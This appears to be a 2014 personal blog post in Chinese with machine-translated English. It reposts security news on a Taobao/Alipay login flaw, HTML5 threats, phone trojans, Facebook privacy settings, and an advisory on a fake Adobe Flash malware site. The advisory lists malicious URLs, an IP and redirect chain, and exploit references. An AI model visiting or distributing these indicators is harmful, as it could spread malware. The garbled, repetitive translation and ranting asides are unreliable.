**續--"上編28日的衛道''黑客者''精神--看看貪婪及邪惡的''比特幣''--
--在哪個'支付宝'和'淘宝'將它成為一種交易貨幣後的结果!!!
?!誰才是''黑客者''來擾亂市場上規模經濟的定案!?--
-->再來述[以往曾解柝過的]説HTML5的新一代-->被病毒不知不覺中侵入,
--然後且看小型網站被病毒入侵現實狀...詳見內文...."
-USA(en)-Continued - compiled on the 28th Wei Road'' by'' hacker spirit -
look greedy and evil'' in which'' bitcoins 'Paypal' and 'Taobao'
Will it be the result of a transaction currency after!!
! who is'' hacker'' to disrupt the market by the economies of scale come finalized state [solution Watchman had previously had] said HTML5 is the next generation -!?> invaded by the virus unknowingly,
- then Let us look at the reality of small sites are viruses like ....
. see inside text .... "!!*
*"淘宝和支付宝"-確認被--->
爆存漏洞 <---黑客可登任意账号操作"!!
2014-02-18 13:30 x0sec FreebuF
(某不方便透露姓名的黑客者)
根據知名漏洞報告平台烏云網公佈的消息,
淘寶安全認證機制存在漏洞,
黑客可以簡單利用該漏洞登錄---
---他人淘寶/支付寶賬號進行操作——>任何人無需密碼,
只需通過搜索引擎、
便可直接獲取其他用戶的隱私
-(賬戶餘額、交易記錄、
收貨地址、姓名手機號碼等敏感信息),
目前不清楚是否影響餘額寶等業務。
[不貪婪.不壞心眼的人-->
便不會跟這個''比特幣"作交易=
=漠視擾亂真實貨幣兌換市場的規則,
也或許有什么樣的狡詐的人在進行''換洗黑暗金錢"么!!?
否則怎會對政府/全世界所否定的''比特幣"不成立,
而妄顧之卻高調地表示你們的接立使用,
這様是否稱作反行其正道??!
"因此,"正義之人"--現身,
給你們貪婪及邪惡的行為一個警告!!!
''正義與邪惡''徒然使現實中的人慾償之結果嘛?!!]
*(en)*"Taobao and Alipay" - confirmed by --->
Critical vulnerabilities exist <--- hackers can board any account operation "!!
2014-02-18 13:30 x0sec FreebuF
(A hacker to disclose the names of persons)
According to well-known loophole reporting platform cloud network announced the news,
Taobao loopholes security authentication mechanism,
Hackers can easily exploit the vulnerability Login ---
--- Others Taobao / Alipay account to operate -> anyone without a password,
Simply by search engines,
Can directly access to other users' privacy
- (Account balances, transaction records,
Shipping address, name, phone number and other sensitive information)
It is unclear whether the impact on the balance of treasure and other services.
[Not greedy people who do not splenetic ->
This will not work with'' Bitcoin "transaction =
= Ignore disrupt real currency exchange market rules
Perhaps what kind of cunning people making money'' dark wash, "What!!?
Otherwise, how could the government / the world are denied the'' Bitcoin "is not true,
Erwang Gu said you was high-profile use of the access legislation,
This is known as the anti-line specifications of its right way??!
"Therefore," justice of the people "- coming out,
Give you a greedy and evil act a warning!!!
'''' Vain and evil so that the results of the reality of human desire subordinated Well?!!] *
*
*--同樣出自烏云網的另一個漏洞報導稱,
淘寶認證缺陷導致可登錄--
--任意淘寶賬戶及支付寶。
烏云網報導稱該漏洞類型為--
--“設計缺陷、邏輯錯誤”,
並將危害等級標為“高”。
目前,該漏洞還在等待廠商進行處理。[冷哼一聲]!!*
*(en)*-Another loophole same from cloud network reported that
Taobao Certification defects can be registered -
- Arbitrary Taobao and Alipay account.
Clouds Network reported that the vulnerability type -
- "Design flaws, logic errors"
And hazard class labeled "high."
Currently, the vulnerability still waiting for vendors for processing. [Lengheng soon] *
*有網友甚至已經利用該漏洞--
--登陸了幾個淘寶賬戶並截圖證明~
*Some netizens have even exploited -
- Landed a few shots Taobao account and prove ~
*目目 前,淘寶和支付寶正在對此漏洞進行排查。
如果你發現支付寶賬戶金額丟失,
可通過撥打客服熱線95188轉1進行諮詢,
轉2進行賬戶凍結。
如果得到來自阿里巴巴的進一步反饋,
我們會及時對此事件進行更新報導。
更新:收到阿里巴巴的反饋稱,
經過排查,
確認這是近期一個新業務規則--
--引起的短時漏洞目前,
他們已經完成了修復,
並確認沒有用户因為此漏洞引發資金風險及損失.
*[還要強詞説没有用户損失.金錢=要想再被''黑客者''--
--時常光顧才懂哭出來的鬼喔!!]
*Currently, Taobao and Alipay investigation is being carried out this vulnerability.
If you find that the amount of lost PayPal account,
Available for consultation by calling a customer service hotline 95188 rpm,
Turn 2 is the account frozen.
If you get further feedback from Alibaba,
We will promptly update this incident reports.
Updated: Alibaba received feedback that
After investigation,
Confirmed that this is a recent new business rules -
- Due to loopholes in the current short-term,
They have completed the repair,
And confirm that no user because this vulnerability caused liquidity
risk and loss.
* [Even stronger word that there is no loss of customers.'' Money = To no longer be frequented by hackers who can understand'' ghost cry out Oh!!]
----------------------------------------------------------------------------------------
**再來談--'新一代HTML5-- 從新功能談網站安全''
[原文網址: 新一代HTML5 從新功能談網站安全評估,Information Security 資安人科技網 http://www.informationsecurity.com.tw/article/article_detail.aspx?aid=6874#ixzz2vK2fhL00]
HTML5為HTML下一個主要的修訂版本,
為了能夠更容易在網頁裡針對多媒體、
圖片等內容作處理,它添加了許多語法特徵。
也增加一些新元素跟屬性,
以便於更易於被搜尋引擎的索引整理、
視障人士使用和方便小螢幕的裝置。
仍應關注舊問題、新威脅--
HTML5的發展越來越成熟,
逐漸取代傳統的Flash互動方式,
如果可以充分運用HTML5,
具有種種好處,
包括如離線功能、即時通訊、
檔案以及硬體支援、
語意化、多媒體等。
舉例來說,使用Gmail的時候,
可以把檔案拖拉到網頁裡作為附件,
這便是部分的HTML5的應用了。
HTML 5是新一代的內容規範,
其涵蓋網頁(Web)、
行動平台與電子書,
預期將成為接下來幾年的內容規格主流。
與一般印象不同的是,
HTML5不僅僅有前一版HTML4的內容規格,
尚且新增許多新的功能,
包含內容面的繪圖、影音;
儲存面的Storage功能、
通訊面的Web Socket與--
--系統多工的Web Worker、
操作面上的拖拉(Drag and Drop)與--
--語音輸入功能等(如上圖),
可以說是有劃時代的改良,
集大成於一身,
對於系統建構規劃與實作人員而言--
--是個不可忽視的新趨勢,
但新科技總會帶來新的威脅,
這句話用於HTML5是再恰當不過了!
我們大致上可以將HTML5中的安全威脅分為三大類--
1. 原有安全問題於HTML5中出現:
如最常見的跨站腳本攻擊(XSS)與--
--資料隱碼攻擊(SQL Injection)
依舊會在HTML5的時代中繼續出現。
2. 因HTML5新功能所衍生之新問題:
以HTML5所提供的新功能來實作完成威脅手法。
例如,以LocalStorage存放XSS攻擊程式--
--與shell code、HTML5為基礎的--
--殭屍網路(Botnet)
-- 透過Web socket API功能--
--達成C&C(Command & Control)--
--以及資料傳輸等;
利用HTML5 達到內部網路掃描,
一般而言,駭客要進入到內部網路--
--除了透過郵件攻擊方式外,
多半需要耗費不少功夫,
而透過HTML5就可以透過--
--使用者瀏覽網頁時就發動對內部網路的掃描。
此外,HTML5還可以在用戶授權下--
--取得GPS位置資料,
用戶隱私更容易暴露風險之中。
3. 因新平台所衍生之新問題:
因為HTML5同時為許多新平台、
新瀏覽器(browser)的內容規格,
因此許多原先的平台與瀏覽器--
--便需要更新其版本與功能。
新平台的推出表示有更多的機會產生弱點,
尤其是要處理HTML5這樣功能豐富、
內容變異性高的內容規格,
可以預期在新平台與--
--新瀏覽器將有新一代的安全問題產生 .*
** Then talk about - 'a new generation of HTML5 - new features to talk about site security''
Original URL: HTML5 new features to talk about a new generation of site security assessment, Information Security Technology Net capital Dorians http://www.informationsecurity.com.tw/article/article_detail.aspx?aid=6874 # ixzz2vK2fhL00
HTML5 is the next major revision of HTML one,
To be able to more easily for multimedia on the page, the
Images and other content for treatment, it adds a lot of grammatical features.
Also add some new elements with attributes
In order to be indexed in the search engines sorting easier,
Easy to use and visually impaired small screen devices.
Should still be concerned about old problems, new threats -
HTML5 is becoming more and more mature,
Gradually replacing the traditional interactive Flash,
If you can make full use of HTML5,
Has many benefits,
Including features such as offline, instant messaging,
Files and hardware support,
Semantic, multimedia and so on.
For example, when using Gmail,
You can drag and drop the file as an attachment to a page where,
This application is part of the HTML5.
HTML 5 is the next generation of content specification,
It covers Web (Web),
Mobile platform and e-books,
Expected to become mainstream in the next few years the content specifications.
And the general impression is different,
Not only have the previous version of HTML5 content HTML4 specifications,
Yet it adds many new features,
Contains the contents of surface graphics, audio and video;
Storage Storage feature surface,
Web Socket Communications surface and -
- System multitasking Web Worker,
Operating surface drag (Drag and Drop) and -
- Voice input function (as shown above),
Can be said that there is an epoch-making improvements,
A master in one,
Construction of the system in terms of planning and implementation staff -
- Is a new trend can not be ignored,
But new technology always brings new threats
This sentence is more appropriate for the HTML5!
Generally speaking, we can HTML5 security threats into three categories -
1 original security issues appear in HTML5:
As the most common cross-site scripting attacks (XSS) and -
- Injection attacks (SQL Injection)
Will still continue to appear in the HTML5 era.
2 new problems arising due to the new features of HTML5:
HTML5 provides a new functionality to implement complete the threat practices.
For example, LocalStorage stored XSS exploits -
- With shell code, HTML5-based -
- Botnets (Botnet)
- Through Web socket API function -
- Reach C & C (Command & Control) -
- As well as data transmission, etc.;
Use HTML5 to reach the internal network scanning,
In general, the hackers to enter into the internal network -
- In addition to outside attacks through the mail,
Probably need to spend a lot of effort,
And through HTML5 can through -
- Users browse the web on the internal network to launch a scan.
In addition, HTML5 can be in the user authorization -
- Get GPS location information,
More likely to be exposed to user privacy at risk.
3 new problems arising as a result of the new platform:
Because while many of the new HTML5 platform
New browser (browser) content specifications,
So many platforms and browsers original -
- They need to update their version and functionality.
The launch of the new platform have more opportunities to produce weakness,
HTML5 in particular, to deal with this feature-rich,
Content content specification high variability,
In the new platform can be expected -
- The new browser will have a new generation of security problems. *
*HTML5的網站、原始碼安全未臻成熟--[??]
值得注意的是,
目前針對網站安全、
原始碼安全的方案--
--鮮少針對HTML5的新功能有相對應的--
--測試與驗證項目,
若您的網站已經採用HTML5的內容格式,
或者您經常使用的網站已經升級到HTML5,
很有可能在安全功能的測試上還沒有充分的保證,
這也將是在資安工具應用上可能的發展方向之一。
這樣的威脅手法可以被運用--
--於遠端攻擊web伺服器、
資訊蒐集、
建立遠端的控制命令模式(remote shell)、
造成機敏資訊的暴露、
網頁式的殭屍網路(botnet)、
DDoS攻擊網站的新方法等。
*HTML5 website, source security not matured -{?? @}
It is noteworthy that,
Currently for site security,
Source security solutions -
- Rarely for the new features of HTML5 have a corresponding -
- Testing and validation projects
If your site has content using HTML5 format,
Or you frequently use the site has been upgraded to HTML5,
Is likely to test the safety features on yet fully guaranteed,
This will also be one of the possible applications of information
security tools development.
Such techniques can be utilized threat -
- On a remote web server attacks,
Information gathering,
Create a remote control command mode (remote shell),
Resulting exposure alert information,
Web-based zombie network (botnet),
A new method of DDoS attacks and other sites. *
-------------------------------------------------
**病毒--->也玩手機--->中毒變“肉雞”!!
在智能手機更新換代的今天,
手機病毒也已經悄然進入到了人們的信息生活!!
** Virus ---> also play phone ---> poisoning becomes "chicken"!!
In today's smartphone replacement,
Mobile phone virus has quietly entered the information into people's lives. !!
*你可別小看了手機病毒,
它會悄悄潛伏,偷偷轉移你的話費,
還可能竊取你的個人隱私,
如果一不留神,
你日常使用的手機還有可能變成“肉雞”。
病毒有硬也有軟--
近日,李女士外出旅遊,
可當5天后她回到家時卻大吃一驚:
她的手機話費竟然欠費多達400元。
李女士到營業廳查詢自己的話費清單發現:
自己的手機與某個不認識的號碼每分鐘--->
--->有近20條短信來往!可是,
手機上並沒有顯示收發的短信。
經過向專業人士諮詢,
李女士才得知手機是因為中了木馬病毒,
導致手機自動收發短信,
因此產生高額話費。
1月20日,記者就此問題諮詢--
--了虹橋電信天翼大世界手機售後服務中心張經理。
他告訴記者,手機病毒有硬病毒也有軟病毒。
一般來說,硬病毒是指一些手機出廠時就有的,
其原理就是通過手機內部的軟件“消費”、盜取信息。
而軟病毒即惡意病毒軟件,
就像電腦病毒一樣,
是一種會損害用戶利益的軟件,
有些會讓你的手機自動大量發送彩信從而產生高額話費。
像“手機骷髏”就是目前比較常見的軟病毒,
中毒後,手機會自動給通訊錄裡的號碼發送短信。
還有一種手機病毒則更可怕,
它們會把用戶的信息,
包括短信、通話記錄,甚至手機位置,
都上傳給不法分子,
或者上傳到特定的網站,
如果用戶在短信中涉及到銀行賬號等個人隱私,
那後果就會很嚴重。
張先生稱:"“總之,你的手機一旦中毒就有可能成為'肉雞'。
如果手機病毒大規模爆發,
整個手機上網速度也會慢下來。”
智能手機易中毒--
那究竟什麼樣的手機容易中毒呢?
三星售後服務公司的李先生說:
'“手機病毒通常感染的都是智能手機。'
因為,手機病毒和電腦病毒一樣需要通過系統傳播,
因為智能手機上網較多,
更易被感染病毒。
但這和智能手機安裝的系統無關,
任何系統都有被感染的可能。”'
“通過手機外觀是無法判斷手機中沒中毒的,
對於個人來說,
主要的還是經常查詢通話、短信流量,
看是否有異常。”張經理說。
相關鏈接--
#-->三招有效預防手機變“肉雞”--
1).用戶手機在收到不明來歷的短信、
彩信、圖片、網址鏈接,
千萬不要輕易打開。
2).不要將手機,
特別是智能機隨便藉給別人使用,
防止被裝惡意軟件。
如遇手機維修,
最好把SIM卡拔出來。
另外,藍牙等功能,不用時最好關掉。
3).可以給智能手機安裝防病毒軟件,
並定期進行升級。
但需要提醒大家的是,
防病毒軟件相對於最新病毒來說,
會有滯後期,
所以不能完全依賴它防止所有病毒的入侵,
還是要經常查看手機流量等使用情況是否有異常。
*You can not underestimate the mobile phone virus,
It will quietly lurking secretly transfer your calls,
May also steal your personal privacy,
If an inattentive,
Daily use of the phone you may also become a "chicken."
There are also hard-virus software -
Recently, Lee travel,
But when she got home after 5 days Shique surprise:
Her phone bill actually owe as much as $ 400.
Ms. Lee to the operating room to check their list of calls that:
Own a mobile phone and do not know the number per minute --->
---> There are nearly 20 text messages between! However,
Do not show the phone to send and receive text messages.
After a consultation to professionals,
Lee learned that the phone is because the Trojan virus,
Cause the phone to automatically send and receive text messages,
Resulting high charges.
January 20, this reporter Advisory -
- Hongqiao World Telecom Tianyi Zhang phone service center.
He told reporters that mobile phone viruses are also hard-virus software virus.
In general, hard-virus refers to the number of mobile phone factory there,
The principle is through the phone's internal software "consumption", to steal information.
The soft-virus software that is malicious viruses,
Like computer viruses,
Is a software that will damage the interests of users,
Some will make your phone automatically send MMS to generate a large number of high charges.
Like "phone Skull" is now more common soft virus,
After the poisoning, the phone will automatically be sent to the address book in the number of text messages.
There is also a mobile phone virus is even more terrible,
They turn the user's information,
Including text messages, call logs, and even cell phone location
Are uploaded to the criminals,
Or upload to a specific website,
If a user comes to bank accounts and other personal privacy in the message,
Then the consequences will be very serious.
Zhang said: "" In short, once your phone is likely to become poisoned 'broilers'.
If the phone is a major outbreak of the virus,
Entire mobile Internet speed will slow down. "
Smartphone Easy poisoning -
What kind of phone that easily poisoned it?
Lee said Samsung's service:
'"Mobile phone virus infections are usually smart phone.'
Because mobile phone viruses and computer viruses spread through the system,
Because the smart mobile Internet more,
More susceptible to infection.
But smart phones and installed system-independent,
Any system may have been infected. "'
"With the appearance of the phone is unable to determine the phone did not poisoning
For individuals,
The main thing is often a query calls, SMS traffic,
See if there are abnormalities. "Zhang said.
Related links -
# -> Three strategies to effectively prevent the phone becomes "chicken" -
1) The user receives phone messages from unknown sources,
MMS, pictures, URL links,
Do not be easily opened.
2) Do not phone,
In particular, the use of intelligent machines just to lend,
Prevent malicious software being installed.
In case of mobile phone repair,
Best to pull out the SIM card.
In addition, Bluetooth and other functions, is not the best time to switch off.
3) can be to install anti-virus software, smart phones,
And regularly upgraded.
But the need to remind everyone that,
Anti-virus software with respect to the latest viruses, the
Will lag,
So you can not completely rely on it to prevent any virus invasion,
Or should always check whether the use of mobile phones flow abnormalities.
-------------------------------------------------- ---------------------------
*"一個小型網站"的電腦病毒求解版塊[於香港地區]---
>實例描述----->詳見連結點----->
該論壇太差了,哪個版主跟電腦''中毒者''説
只是廣告病毒---??!!我們為之側目(感覺好笑!)
不懂便是不懂...呵呵~而且他哪兒的人們=
=只會''靠着面子要緊第一喔!!=上天的神來報應了!!
各位專家們請按一下連結點吧 =
http://computer.uwants.com/forumdisplay.php?fid=1091
--是否看見很多有顏色的求解毒者的帖子..!
可惜是哪兒的人囂張自大@,[不可救也!佛祖家也閉目休息了~]
各位有否感覺到"它的''html在緩慢地移動??
已經被植入''非常病毒碼"喔!
專家定必知道是什么=不能說的秘密喔!~哈哈..*
*"A small site" computer virus solving forum [in Hong Kong] ---
> Instance description -----> See links point ----->
The forum is bad, what with the computer'' moderators'' said poisoning
Just ad virus ---??!! Our look askance (feel funny!)
Do not know do not know ... Oh ~ And that is where his people =
='' Will bear against the face of the first Oh!! = God's retribution of God!!
Experts you click the link point of it =
http://computer.uwants.com/forumdisplay.php?fid=1091
--Are there a lot of color to see who's seeking detoxification posts ..!
Unfortunately, where the person is arrogant arrogant @,
[can not save it! Buddha family also turn a blind eye to rest ...]
Whether you have felt "it'' html slowly moving in??
'' Very virus has been implanted, "Oh!
Experts will certainly know what = Secret Oh! ~ Haha .....*
*續--"上編28日的衛道''黑客者''精神--看看貪婪及邪惡的''比特幣''--
--在哪個'支付宝'和'淘宝'將它成為一種交易貨幣後的结果!!!
誰才是''黑客者''來擾亂市場上規模經濟的定案!?--
再來述[以往曾解柝過的]説HTML5的新一代-->被病毒不知不覺中侵入,-
-然後且看小型網站被病毒入侵現實狀...詳見內文....
"-USA(en)-Continued - compiled on the 28th Wei Road'' by'' hacker spirit - look greedy and evil'' in which'' bitcoins 'Paypal' and 'Taobao' Will it be the result of a transaction currency after!! ! who is'' hacker'' to disrupt the market by the economies of scale come finalized state--
-- [solution Watchman had previously had] said HTML5--
-- is the next generation -!?> invaded by the virus unknowingly,
- then Let us look at the reality of small sites are viruses like ...
.. see inside text .... "!!*===THE END===Melody.Blog~===>/
seriously Disclaimer: This blog is for knowledge sharing in the required software and who, after the download is complete, please delete files on round the clock. Do not miss think there is anything about "sex" or anything .- resulting in what message the people of color, but today I had to make a statement = do not leave "what's up?..".. not reply,& also bring you turned away. filthy sharer spirit!! 29 / 8.Thankyou! [Thanks of the BLOGGER TEAM~!]2014
首頁
▼
2014年3月7日 星期五
*續--"上編28日的衛道''黑客者''精神--看看貪婪及邪惡的''比特幣''在哪個'支付宝'和'淘宝'將它成為一種交易貨幣後的结果!!!誰才是''黑客者''來擾亂市場上規模經濟的定案!?再來述[以往曾解柝過的]説HTML5的新一代-->被病毒不知不覺中侵入,--然後且看小型網站被病毒入侵現實狀...詳見內文...."-USA(en)-Continued - compiled on the 28th Wei Road'' by'' hacker spirit - look greedy and evil'' in which'' bitcoins 'Paypal' and 'Taobao' Will it be the result of a transaction currency after!! ! who is'' hacker'' to disrupt the market by the economies of scale come finalized state [solution Watchman had previously had] said HTML5 is the next generation -!?> invaded by the virus unknowingly, - then Let us look at the reality of small sites are viruses like ... see inside text .... "!!
*知識分享-"排除惡意之人的行為< -- "加強你的Facebook隱私設定 ,---> "讓你免於被惱人的購物社群標記~!!及及重要資訊*- *請小心擬真度百分之百且同步更新的假Adobe惡意網站!-- --安全通報2014-02-27~!*-USA(en)-* Knowledge Sharing - " to exclude malicious human behavior < - "Strengthening your Facebook privacy settings --- > "Let your shopping community from being annoying tag ~ ! ! And , And important information-* Please be careful hundred percent degree of verisimilitude and synchronized updates malicious fake Adobe website ! -- Security Advisory 2014-02-27~*!
*知識分享-"排除惡意之人的行為< -- "加強你的Facebook隱私設定 ,
---> "讓你免於被惱人的購物社群標記~!!及及重要資訊*-
*請小心擬真度百分之百且同步更新的假Adobe惡意網站!--
--安全通報2014-02-27~!*-USA(en)-* Knowledge Sharing -
" to exclude malicious human behavior < -
"Strengthening your Facebook privacy settings --- >
"Let your shopping community from being annoying tag ~ ! ! And , And important information-
* Please be careful hundred percent degree of verisimilitude and synchronized updates malicious fake Adobe website ! -- Security Advisory 2014-02-27~*! *
*塗鴉牆上出現了不少標記人的購物粉絲團,
有鞋子、衣服、包包…等五花八門的商品,
這些商品照片上會有一個Line的ID
但是最討人厭的莫過於它標記了大量的人,
不斷的出現在你的Facebook塗鴉牆
仔細一看,可以發現這些照片上,
被標記的人都是由「同一個人」所標註(如下圖)*
*Graffiti on the wall , there were many people shopping
fan group labeled ,
There are shoes, clothes, bags ... and other sorts of goods,
These products have a Line of photo ID
But the most annoying than it marked a lot of people,
Constantly appear on your Facebook wall
A closer look , you can find these photos ,
People are marked by the " same person "
marked ( see below)*
*原來,是那個標註大家在相片裡的人帳號被盜了,
其帳號被駭客所竊取後,
即會將其朋友標記在那些購物粉絲團的照片中。
AegisLab在此提供幾個步驟的簡單設定教學,
讓大家免於受這些購物粉絲社群標記所擾!
1). 首先,開啟你Facebook個人帳戶設定中--
--的「動態時報與標籤」,
我們來設定「誰可以在我的動態時報新增貼文?」--
--和「我該如何管理別人加上的標籤以及標籤建議?」這2個選項吧!
*It turned out that labeling everyone who is in the photo where the account was stolen,
After his account was stolen by hackers ,
That will mark his friend in the photo in those shopping fan group .
AegisLab provides a simple set of teaching several steps in this ,
Let us immune to these shopping fan community marked by disturbed !
1 ) First, open your Facebook personal account settings -
- The "Dynamic Times and labels "
We set "Who can add postings in my timeline ? " -
- And " How do I manage other people 's labels and tags plus suggestions ? " This two options it !
*
*2). 設定「誰可以在我的動態時報新增貼文?」
誰可以在你的動態時報上發佈文章?
可以設定是「朋友」或「只限本人」。
設定為「只限本人」,不怕被盜帳號的朋友在你的塗鴉牆上發文了!
*2 ) Set "Who can add text posted on my timeline ? "
Who can publish articles on your timeline ?
You can set a " friend " or " Only I ."
Is set to " Only I ," not afraid of the stolen account your friends Posting a graffiti wall !
*審查朋友們把你標註在內的貼文,
是否要顯示在你的動態時報?
可以設定為「啟用」或「關閉」。
設定為「啟用」,
這樣標註你的貼文都必需透過你的審核,
才會顯示在你的動態時報。*Review your friends , including marked Posts ,
Do you want to appear in your timeline ?
Can be set to "Enable " or "off ."
Set "Enable" is ,
Such labels are necessary for your postings through
your audit ,
Will appear in your timeline .
*3). 設定「我該如何管理別人加上的標籤以及標籤建議?」
標籤出現在 Facebook 之前,
先檢查別人貼在你貼文中的標籤?
可以設定為「啟用」或「關閉」。
設定為「啟用」,
這樣當有人要標記你時,
都必須經過你的審查,才會被允許標記。*3 ) Set " How do I manage other people 's labels and tags plus suggestions ? "
Labels appear before Facebook,
Someone posted on your first check the label affixed
to the text ?
Can be set to "Enable " or "off ."
Set "Enable" is ,
So that when someone wants to tag you,
You must go through the review , will be allowed tag.
*
*當你被標註在貼文中時,
如果你要分享的朋友還沒在分享對象中,
你想加誰到分享名單?
可以設定為「朋友」、「只限本人」或「自訂」。
設定為「只限本人」,
這樣當你被標註在貼文時,
只有你自己會看到該貼文,
不會讓你的朋友們看到。
*When you paste the text is marked in time ,
If you are not a friend to share in the sharing of objects ,
Do you want to add a list of who to share ?
Can be set to "Friends ," " Only I " or "Custom ."
Is set to " Only I "
So that when you paste the text is marked in time ,
Only you will see the postings ,
Do not let your friends see .
*
*在有看起來像你的相片被上傳後,
誰可以看到姓名標籤建議?
可以設定為「朋友」或「沒有人」。
設定為「沒有人」,
這樣當有與你相像的照片被上傳後,
便不會出現你的姓名標籤建議了。
*There looks like in your photo is uploaded,
Who can see the name tag suggestions ?
Can be set to "friends" or " no one ."
Is set to " nobody "
So that when you have similar photos are uploaded ,
Your name will not appear label suggested .
*
*只要照著以上這些步驟,
那些惱人的購物社群要標記你時,
都得經過你審核才行,
而你被標記的貼文也只有你會看到,
不會影響到你Facebook上的好友了!
以上只是加強自己本身的隱私設定,
還必須讓身邊的朋友也知道這些隱私設定的重要性,
才能減少Facebook塗鴉牆上那些惱人的廣告訊息。
這些隱私設定都只是「治標」,
良好的使用習慣和基本的資安意識才是「治本」喔!
如何知道自己對哪些專頁按過讚及如何取消?
*Just follow these steps
Those annoying when you want to mark shopping community ,
You had to go through an audit job ,
And you paste text marked only you will see ,
Does not affect you, your friends on Facebook !
These are just strengthen its own privacy settings ,
You must also let her friends know the importance of these privacy settings,
Facebook Graffiti on the wall in order to reduce those
annoying advertising messages .
These privacy settings are only " temporary "
Good habits and basic information security awareness
is the " cure " Oh !
How do I know what special page on pressed praise and
how to cancel ?
*1). 點選「活動紀錄」
*1 ) Tap "Activity History"
*2). 點選「讚」、「專頁和興趣」
*2 ) Tap "Like" , " Fan Page and interests ."
*3).點選專頁右上方的編輯鈕,
即可「收回讚」或是檢舉對方 .
*3 ) Tap the Edit button at the top right special page ,
To " recover Like" or spotted each other.
------------------------------------------------------------------------
**再分享重要資訊--*請小心擬真度百分之百且同步更新的--
--假Adobe惡意網站!----安全通報2014-02-27~!*
AegisLab 近日發現了一個惡意網站: hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/
_samples/api_dialog/js.html
我們可以看出此惡意的 js.html 是位於 cpanel 裡的 ckediter 目錄
cPanel為一個後台管理系統,讓你透過網頁方式管理你的網站
CKEditer為一個使用在網頁上的所見即所得文字編輯器
這2個元件的漏洞時有所聞:
*cPanel Security = https://cpanel.net/category/security/
CKEditor 3.6.1 File Upload Vulnerability = http://www.bugsearch.net/en/13642/ckeditor-361-file-upload-vulnerability.html
CKEditor 4.0.1 – Multiple Vulnerabilities =
http://www.exploit-db.com/exploits/24530/
我們推測是這2個元件的問題,
才讓駭客將惡意的 js.html 塞到該目錄下
*這個網站會先判斷你的瀏覽器類型和版本、
作業系統、IP、Flash版本、AdobeReader版本等資訊,
再將你導至不同的 URL 下載一個假--
--的 Flash Player 安裝檔,
部份原始碼如下↓ *
*AegisLab所測試的惡意流程:
*(en)*
*cPanel is a backstage management system that
allows you to manage your way through the web site
CKEditer use on a website WYSIWYG text editor
Vulnerability of these two elements often heard :
cPanel Security = https://cpanel.net/category/security/
CKEditor 3.6.1 File Upload Vulnerability = http://www.bugsearch.net/en/13642/ckeditor-361-file-upload-vulnerability.html
CKEditor 4.0.1 - Multiple Vulnerabilities =
http://www.exploit-db.com/exploits/24530/
We speculate that these two elements are the problem ,
and will only let malicious hackers js.html stuffed
into that directory
This site will first determine your browser type and version, operating system , IP, Flash version ,
AdobeReader information such as version ,
You then lead to a different URL to download a fake -
- The Flash Player installation file ,
Part of the source code below ↓
*AegisLab tested malicious process:
hxxp :/ / www.ajyadgroup.net / old / ajyad_cpanel / ckeditor / _samples / api_dialog / js.html
→ hxxp :/ / 142.0.79.184/agent/agent.php? Cr = ila
→ hxxp :/ / 142.0.79.184/agent/agent_check.php? Ip = 114.44.216.107 & cr = ila
→ hxxp :/ / 142.0.79.184/agent/agent_save.php? Cr = ila & Browser_Type = IE & Browser_Version = 6.0 & OS = Windows + XP & OS_Version = & IP = 114.44.216.107
& referer = & Flash = 11,5,502,146 & Shockwave = null & Silverlight = null & VLC = null & WindowsMediaPlayer =
9,0,0,3250 & PDFReader = null & AdobeReader = 9,5,0,0 & DevalVR = null & QuickTime = null & RealPlayer = null
& IE_ActiveX = true
Finally, download the fake Flash Player installation file :
hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe
--------------------------------
*這個假的 Flash Player 為病毒,在virustotal的偵測率:(23/48) =
= https://www.virustotal.com/en/file/a54cb6c8b5989c76a942ca9350a53d4c3c9068a647ec5bb697e16c12c1c83f50/analysis/
有趣的是…``
最後下載的PE URL的host -
adobeflashupdate1.com,
頁面看起來跟真的一模一樣,
這真的是 Adobe 官方的站嗎??!!@?
*This fake Flash Player for the virus , the detection rate in virustotal : ( 23 /48 ) =
= Https://www.virustotal.com/en/file/a54cb6c8b5989c76a942ca9350a53d4c3c9068a647ec5bb697e16c12c1c83f50/analysis/
Interestingly ... `
Download the PE URL host the final -
adobeflashupdate1.com,
Page looks exactly the same with the real ,It
It's really is Adobe 's official stand it??!! @
*#左上方的 Adobe 標誌連結也是連到 www.adobe.com ,
但看其網頁原始碼就發現真相了!
-----------------------------
*en# Adobe logo at the top left link is also connected to www.adobe.com,
But looking at their page source discovered the truth !
*Originally, it is embedded inside a www.adobe.com of -
- Iframe inside,
So it looks exactly the same only with Adobe 's official website ! ! !
adobeflashupdate1.com in virustotal detection rate: (7/53) =
= Https://www.virustotal.com/en/url/3e8f7243be9d55d2182a6c5d26028f2721bb6ce7375c9eec37a45eff740df064/analysis/
AegisLab WebGuard has -
- [D] adobeflashupdate1.com
-added to the rule in the block ,
Remind customers to stay in WebGuard signature updates !*
**知識分享-"排除惡意之人的行為< -- "加強你的Facebook隱私設定 ,
---> "讓你免於被惱人的購物社群標記~!!及 -重要資訊*請小心擬真度百分之百 -且同步更新的假Adobe惡意網站!-- --安全通報2014-02-27~!*
-USA(en)-* Knowledge Sharing - " to exclude malicious human behavior < - "Strengthening your Facebook privacy settings
--- > "Let your shopping community from being annoying tag ~ ! ! And , And important information-*Please be careful hundred percent degree of verisimilitude and synchronized updates malicious fake Adobe website ! -- Security Advisory 2014-02-27~*!
===Sincerely === THE END === Melody.Blogger~===>/
---> "讓你免於被惱人的購物社群標記~!!及及重要資訊*-
*請小心擬真度百分之百且同步更新的假Adobe惡意網站!--
--安全通報2014-02-27~!*-USA(en)-* Knowledge Sharing -
" to exclude malicious human behavior < -
"Strengthening your Facebook privacy settings --- >
"Let your shopping community from being annoying tag ~ ! ! And , And important information-
* Please be careful hundred percent degree of verisimilitude and synchronized updates malicious fake Adobe website ! -- Security Advisory 2014-02-27~*! *
*塗鴉牆上出現了不少標記人的購物粉絲團,
有鞋子、衣服、包包…等五花八門的商品,
這些商品照片上會有一個Line的ID
但是最討人厭的莫過於它標記了大量的人,
不斷的出現在你的Facebook塗鴉牆
仔細一看,可以發現這些照片上,
被標記的人都是由「同一個人」所標註(如下圖)*
*Graffiti on the wall , there were many people shopping
fan group labeled ,
There are shoes, clothes, bags ... and other sorts of goods,
These products have a Line of photo ID
But the most annoying than it marked a lot of people,
Constantly appear on your Facebook wall
A closer look , you can find these photos ,
People are marked by the " same person "
marked ( see below)*
*原來,是那個標註大家在相片裡的人帳號被盜了,
其帳號被駭客所竊取後,
即會將其朋友標記在那些購物粉絲團的照片中。
AegisLab在此提供幾個步驟的簡單設定教學,
